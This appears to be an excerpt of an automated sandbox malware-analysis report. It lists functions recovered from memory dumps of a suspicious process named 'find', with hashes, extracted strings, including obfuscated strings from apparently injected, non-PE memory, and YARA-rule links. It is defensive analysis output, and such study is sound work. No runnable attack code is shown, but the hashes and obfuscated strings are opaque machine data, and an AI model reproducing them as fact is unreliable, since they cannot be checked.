                                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                        • API String ID: 0-3558027158
                                                                                                                                        • Opcode ID: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                                                                        • Instruction ID: 76ac4abed3cd9c1636e78bff7380abdf9bf3379ba1499223db1270d6310fc381
                                                                                                                                        • Opcode Fuzzy Hash: e0d76da973dc9e9afa2a2757dc803c9f43d442ce4fccf21f6a86c7a9a92e3bfc
                                                                                                                                        • Instruction Fuzzy Hash: 88915FF04482988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058F85
                                                                                                                                        Function 02FA3B21 Relevance: 52.6, Strings: 42, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127540782.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_2fa0000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                                                                        • API String ID: 0-606234297
                                                                                                                                        • Opcode ID: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                                                                        • Instruction ID: e45c99f36ce07d97f1e93eb29b4232a8a1bf0574ca89ae2582ccb572583d777a
                                                                                                                                        • Opcode Fuzzy Hash: 6df663d635a1a1722d89c8c0425043685b6303dc4a697d6caa717b5cfa18fba6
                                                                                                                                        • Instruction Fuzzy Hash: 28413EB084434CEBCF158F85E980ADEBB71FF01380F905219E9486F368CB758A56CB89
                                                                                                                                        Function 030F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 48c6106448f63dcb5013cb63f182d978e272a35d39377010f71b400b7536232e
                                                                                                                                        • Instruction ID: c2e56c690a7c1cc118d366f5d30bc9c326d1fcd6e6af27cb9b4ce2e0e37d5868
                                                                                                                                        • Opcode Fuzzy Hash: 48c6106448f63dcb5013cb63f182d978e272a35d39377010f71b400b7536232e
                                                                                                                                        • Instruction Fuzzy Hash: 025107B9A05256BFCB20DB98C88097FFBFCBF4C2007148569E5A5D7A41D774DE508BA0
                                                                                                                                        Function 03162410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        • Opcode ID: 4a79bf933a9f00a0f78b974de8d52b3e5ea091ae8a212c4e6436ca354d7ecd4b
                                                                                                                                        • Instruction ID: f7ff211c854e4b615d809de8642c9cc0036305af72ea848336c62a17e5c1f431
                                                                                                                                        • Opcode Fuzzy Hash: 4a79bf933a9f00a0f78b974de8d52b3e5ea091ae8a212c4e6436ca354d7ecd4b
                                                                                                                                        • Instruction Fuzzy Hash: A451E4B5A04645AFCB34DEDCC8909BFBBF9AB4C200B048899E4D5DB681E7B4DA518760
                                                                                                                                        Function 030E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03124787
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03124742
                                                                                                                                        • Execute=1, xrefs: 03124713
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03124725
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031246FC
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03124655
                                                                                                                                        • ExecuteOptions, xrefs: 031246A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        • Opcode ID: 468f923b716767525bcdcba58cad28ce2b0744d6f7c69b02a168c9cedbb39d36
                                                                                                                                        • Instruction ID: 234ace80790ea65a8c0f3bed00579a2c0843242f2a8271612a715f4a6ba0e63e
                                                                                                                                        • Opcode Fuzzy Hash: 468f923b716767525bcdcba58cad28ce2b0744d6f7c69b02a168c9cedbb39d36
                                                                                                                                        • Instruction Fuzzy Hash: 72512835B02319AFEF15EBA4DC85FEEB7A8AF48B04F040099D605AF191EB709A418F50
                                                                                                                                        Function 03186940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                        • Instruction ID: 1e8aa70f850231d7d040cb862e9a36b2f68605b74f7b004376fc2cc6df0f0c79
                                                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                        • Instruction Fuzzy Hash: E0021675609341AFC305EF18C890A6BBBE5EFC8714F148A2DFA895B264DB31E905CF46
                                                                                                                                        Function 030FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction ID: 8b8b34a6617065525eee684d08a73259d5f8dc770bce64b05d6cf4c6a06de5b8
                                                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                        • Instruction Fuzzy Hash: ED81AD74E072499FDF24CE68C8917FEBBE6AF85310F1C465ADA61A7B90C6389841CF50
                                                                                                                                        Function 031620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                                        • Opcode ID: 3d19eb5e353564a7fe001daae1dc393f39d814225a1cb24b0adb6ae472cfdc4e
                                                                                                                                        • Instruction ID: f08d99adf8bd48e1bbcc5ae73ae0b4253084f9d14855b0d17d0dd6c1bb1f921c
                                                                                                                                        • Opcode Fuzzy Hash: 3d19eb5e353564a7fe001daae1dc393f39d814225a1cb24b0adb6ae472cfdc4e
                                                                                                                                        • Instruction Fuzzy Hash: 0521517AE01219ABCB10DFA9D840AFFB7E8AF48640F080516E905E7240E730DA128BA1
                                                                                                                                        Function 030DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031202BD
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031202E7
                                                                                                                                        • RTL: Re-Waiting, xrefs: 0312031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        • Opcode ID: 72819c4254055148f33d38b77de5da36dfcec8be0f4f9ac3f4396fd9eb193c4b
                                                                                                                                        • Instruction ID: f5392239d0b0c0f39b8889ee26cfe3999b213d27826342c3b4daf6c0f755cdb0
                                                                                                                                        • Opcode Fuzzy Hash: 72819c4254055148f33d38b77de5da36dfcec8be0f4f9ac3f4396fd9eb193c4b
                                                                                                                                        • Instruction Fuzzy Hash: 4CE1CF346097429FD725CF28C884B6ABBE4BF8C314F188A5DF5A68B2E0D774D855CB42
                                                                                                                                        Function 030EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03127B7F
                                                                                                                                        • RTL: Resource at %p, xrefs: 03127B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 03127BAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        • Opcode ID: 8d74260dd5187067eb19d1ce9a02c7bc182c7f98d4c9c637b899609612d002cc
                                                                                                                                        • Instruction ID: 4d94137d2de14fab27025bc659b0d05aa4a6cd2d1019884df1399c6bfe233f9d
                                                                                                                                        • Opcode Fuzzy Hash: 8d74260dd5187067eb19d1ce9a02c7bc182c7f98d4c9c637b899609612d002cc
                                                                                                                                        • Instruction Fuzzy Hash: C741113570A7029FCB24DE28C840B6BB7E5EF89710F040A2DF95ADB781DB31E8158B91
                                                                                                                                        Function 030EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0312728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Resource at %p, xrefs: 031272A3
                                                                                                                                        • RTL: Re-Waiting, xrefs: 031272C1
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03127294
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        • Opcode ID: 5e4a13fab3ca177fe1ee713ca8577f38b25344add3902775f49665bfcdf6d67b
                                                                                                                                        • Instruction ID: cd9683627de7054d6d934beb05d17f8701d74884c458991f1a97494f5e6c5fa7
                                                                                                                                        • Opcode Fuzzy Hash: 5e4a13fab3ca177fe1ee713ca8577f38b25344add3902775f49665bfcdf6d67b
                                                                                                                                        • Instruction Fuzzy Hash: 13412E36705312AFCB20CE25CC41B6BBBA5FF8D710F140A19F855EB681DB20E8228BD0
                                                                                                                                        Function 03162300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                        • Opcode ID: 80dd719df42a8fb6d05875e73df641c3921e156fd2432e190b39bf8c3ce83025
                                                                                                                                        • Instruction ID: bcc3dbaac5917fab63a452fb25a6b4f77520e4f2cb0bab54f03dd77a1d06e429
                                                                                                                                        • Opcode Fuzzy Hash: 80dd719df42a8fb6d05875e73df641c3921e156fd2432e190b39bf8c3ce83025
                                                                                                                                        • Instruction Fuzzy Hash: 84317876A007199FCB20DF69DC40BEEB7F8EF4C650F444596E849E7240EB309A558BA0
                                                                                                                                        Function 030F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction ID: 24cf83180cf75c356469984166f9b08fb2523c9fa5b1df1803fd3323d5681b01
                                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction Fuzzy Hash: AE91D870E0220A9FDF64CE69C8817FEB7F5EF44BA0F58451AEA65E7AC0D73089418712
                                                                                                                                        Function 030B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, Offset: 03080000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.00000000031AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_2_3080000_find.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        • Opcode ID: b9a316e399bcb611f79b6d23f2ba2e09f11d5af142a0a32909d71305d99d271d
                                                                                                                                        • Instruction ID: b2ee7b263037a99340f3339d68c1dad483ed3de3d6d16626ade6c9d2db3683b6
                                                                                                                                        • Opcode Fuzzy Hash: b9a316e399bcb611f79b6d23f2ba2e09f11d5af142a0a32909d71305d99d271d
                                                                                                                                        • Instruction Fuzzy Hash: BE813975D012699BDB35DB54CC44BEEB7B8AF48750F0445EAEA19B7280E7309E81CFA0